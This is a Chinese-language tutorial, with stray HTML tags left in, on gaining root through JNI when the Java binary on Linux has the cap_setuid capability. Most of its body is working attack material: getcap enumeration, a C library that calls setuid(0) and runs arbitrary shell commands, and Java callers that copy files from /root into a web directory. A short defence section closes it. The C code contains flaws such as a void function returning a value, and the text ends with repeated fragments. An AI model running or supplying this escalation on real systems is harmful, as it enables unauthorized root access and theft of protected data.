Java特权下的JNI提权技术研究<\/h1>

一、概述<\/h2>
Java Native Interface (JNI)提权是一种利用Java本地接口调用本地系统功能实现权限提升的技术。当Java程序具有特殊权限（如Linux的capabilities中的`cap_setuid<\/code>）时，可以通过JNI调用本地代码执行特权操作。<\/p>`

二、前置条件<\/h2>

Java程序具有特殊权限<\/strong>：

使用getcap<\/code>命令检查Java是否具有cap_setuid<\/code>权限：
getcap -r \/ 2>\/dev\/null
<\/span><\/span>\/usr\/local\/openjdk-8\/bin\/java =<\/span> cap_setuid+ep
<\/span><\/span><\/code><\/pre><\/li>
上述输出表示Java具有设置用户ID的权限<\/li>
<\/ul>
<\/li>
<\/ol>
三、JNI提权实现步骤<\/h2>
1. 创建Java本地接口类<\/h3>
首先创建一个包含native方法声明的Java类：<\/p>
public<\/span> class<\/span> NativeLibraryExample<\/span> {<\/span>
<\/span><\/span>    \/\/ 声明native方法
<\/span><\/span><\/span><\/span>    public<\/span> native<\/span> void<\/span> nativeMethod<\/span>(<\/span>String cmd);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>2. 生成头文件<\/h3>
编译Java类并生成C头文件：<\/p>
javac NativeLibraryExample.java
<\/span><\/span>javah -jni NativeLibraryExample
<\/span><\/span><\/code><\/pre>3. 编写本地实现代码<\/h3>
创建C文件实现native方法，关键点在于调用setuid(0)<\/code>：<\/p>
#include<\/span> <jni.h><\/span>
<\/span><\/span><\/span>#include<\/span> "NativeLibraryExample.h"<\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <sys\/types.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>int<\/span> execmd<\/span>(const<\/span> char<\/span> *<\/span>cmd, char<\/span> *<\/span>result) {
<\/span><\/span>    setuid(0<\/span>);  \/\/ 关键提权操作
<\/span><\/span><\/span><\/span>    char<\/span> buffer[1024<\/span>*<\/span>12<\/span>];
<\/span><\/span>    FILE *<\/span>pipe =<\/span> popen(cmd, "r"<\/span>);
<\/span><\/span>    if<\/span> (!<\/span>pipe) return<\/span> 0<\/span>;
<\/span><\/span>    
<\/span><\/span>    while<\/span> (!<\/span>feof(pipe)) {
<\/span><\/span>        if<\/span> (fgets(buffer, sizeof<\/span>(buffer), pipe)) {
<\/span><\/span>            strcat(result, buffer);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    pclose(pipe);
<\/span><\/span>    return<\/span> 1<\/span>;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>JNIEXPORT void<\/span> JNICALL Java_NativeLibraryExample_nativeMethod<\/span>(
<\/span><\/span>    JNIEnv *<\/span>env, jobject obj, jstring jstr) {
<\/span><\/span>    
<\/span><\/span>    const<\/span> char<\/span> *<\/span>cstr =<\/span> (*<\/span>env)-><\/span>GetStringUTFChars(env, jstr, NULL);
<\/span><\/span>    char<\/span> result[1024<\/span>*<\/span>12<\/span>] =<\/span> ""<\/span>;
<\/span><\/span>    
<\/span><\/span>    if<\/span> (1<\/span> ==<\/span> execmd(cstr, result)) {
<\/span><\/span>        \/\/ 命令执行成功处理
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    char<\/span> return_messge[100<\/span>] =<\/span> ""<\/span>;
<\/span><\/span>    strcat(return_messge, result);
<\/span><\/span>    jstring cmdresult =<\/span> (*<\/span>env)-><\/span>NewStringUTF(env, return_messge);
<\/span><\/span>    return<\/span> cmdresult;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 编译为动态链接库<\/h3>
gcc -fPIC -I"<\/span>$JAVA_HOME\/include"<\/span> -I"<\/span>$JAVA_HOME\/include\/linux"<\/span> -shared -o libcmd.so JniClass.c
<\/span><\/span><\/code><\/pre>5. 创建调用类<\/h3>
编写Java类加载动态库并调用native方法：<\/p>
public<\/span> class<\/span> Main<\/span> {<\/span>
<\/span><\/span>    public<\/span> native<\/span> void<\/span> nativeMethod<\/span>(<\/span>String cmd);<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>        System.<\/span>load<\/span>(<\/span>"\/tmp\/libcmd.so"<\/span>);<\/span>
<\/span><\/span>        NativeLibraryExample example =<\/span> new<\/span> NativeLibraryExample();<\/span>
<\/span><\/span>        example.<\/span>nativeMethod<\/span>(<\/span>"cat \/root\/message.txt > \/tmp\/2.txt"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>6. 执行提权操作<\/h3>
javac Main.java
<\/span><\/span>java Main
<\/span><\/span><\/code><\/pre>四、纯JNI SetUID提权实现<\/h2>
1. 创建SetUID本地接口<\/h3>
#include<\/span> <jni.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>JNIEXPORT jint JNICALL Java_SetUID_setUID<\/span>(JNIEnv *<\/span>env, jobject obj, jint uid) {
<\/span><\/span>    return<\/span> setuid(uid);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>2. 编译为动态库<\/h3>
gcc -shared -fPIC -o libSetUID.so -I${<\/span>JAVA_HOME}<\/span>\/include -I${<\/span>JAVA_HOME}<\/span>\/include\/linux SetUID.c
<\/span><\/span><\/code><\/pre>3. Java调用类<\/h3>
public<\/span> class<\/span> SetUID<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        System.<\/span>loadLibrary<\/span>(<\/span>"SetUID"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> native<\/span> int<\/span> setUID<\/span>(<\/span>int<\/span> uid);<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        SetUID setUID =<\/span> new<\/span> SetUID();<\/span>
<\/span><\/span>        int<\/span> result =<\/span> setUID.<\/span>setUID<\/span>(<\/span>0<\/span>);<\/span>  \/\/ 提权到root
<\/span><\/span><\/span><\/span>        Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>new<\/span> String[]{<\/span>"sh"<\/span>,<\/span> "-c"<\/span>,<\/span> "cat \/root\/*.txt>\/opt\/jetty\/webapps\/ROOT\/root.txt"<\/span>});<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>4. 执行提权<\/h3>
javac SetUID.java
<\/span><\/span>java -Djava.library.path=<\/span>\/opt\/jetty\/webapps\/ROOT\/ -cp \/opt\/jetty\/webapps\/ROOT\/ SetUID
<\/span><\/span><\/code><\/pre>五、关键点说明<\/h2>


setuid(0)调用<\/strong>：这是提权的核心，将进程用户ID设置为0(root)<\/p>
<\/li>

Java Capabilities检查<\/strong>：<\/p>

必须确认Java具有cap_setuid<\/code>权限<\/li>
使用getcap<\/code>命令验证<\/li>
<\/ul>
<\/li>

JNI编译注意事项<\/strong>：<\/p>

必须包含正确的头文件路径($JAVA_HOME\/include<\/code>和$JAVA_HOME\/include\/linux<\/code>)<\/li>
使用-fPIC<\/code>和-shared<\/code>选项生成动态库<\/li>
<\/ul>
<\/li>

执行环境<\/strong>：<\/p>

需要设置正确的库路径(-Djava.library.path<\/code>)<\/li>
确保类路径(-cp<\/code>)包含所需类文件<\/li>
<\/ul>
<\/li>

安全限制<\/strong>：<\/p>

现代Linux系统可能有安全机制限制此类提权<\/li>
SELinux或AppArmor可能阻止此类操作<\/li>
<\/ul>
<\/li>
<\/ol>
六、防御措施<\/h2>


限制Java的capabilities<\/strong>：<\/p>
setcap -r \/usr\/local\/openjdk-8\/bin\/java
<\/span><\/span><\/code><\/pre><\/li>

使用最小权限原则<\/strong>：不要给Java程序不必要的权限<\/p>
<\/li>

监控JNI调用<\/strong>：安全审计应关注JNI的使用情况<\/p>
<\/li>

更新Java安全策略<\/strong>：限制可以加载本地库的代码<\/p>
<\/li>

使用安全模块<\/strong>：如SELinux或AppArmor限制进程行为<\/p>
<\/li>
<\/ol>
七、总结<\/h2>
JNI提权技术利用了Java程序具有特殊权限时，通过本地代码执行系统调用的能力。这种技术特别危险，因为它可以绕过Java的安全沙箱。系统管理员应定期检查关键程序的capabilities设置，开发者应避免不必要的JNI调用，特别是涉及权限操作的情况。<\/p>

Java特权下的JNI提权技术研究<\/h1>

一、概述<\/h2> Java Native Interface (JNI)提权是一种利用Java本地接口调用本地系统功能实现权限提升的技术。当Java程序具有特殊权限（如Linux的capabilities中的cap_setuid<\/code>）时，可以通过JNI调用本地代码执行特权操作。<\/p>

三、JNI提权实现步骤<\/h2>

四、纯JNI SetUID提权实现<\/h2>

一、概述<\/h2>
Java Native Interface (JNI)提权是一种利用Java本地接口调用本地系统功能实现权限提升的技术。当Java程序具有特殊权限（如Linux的capabilities中的`cap_setuid<\/code>）时，可以通过JNI调用本地代码执行特权操作。<\/p>`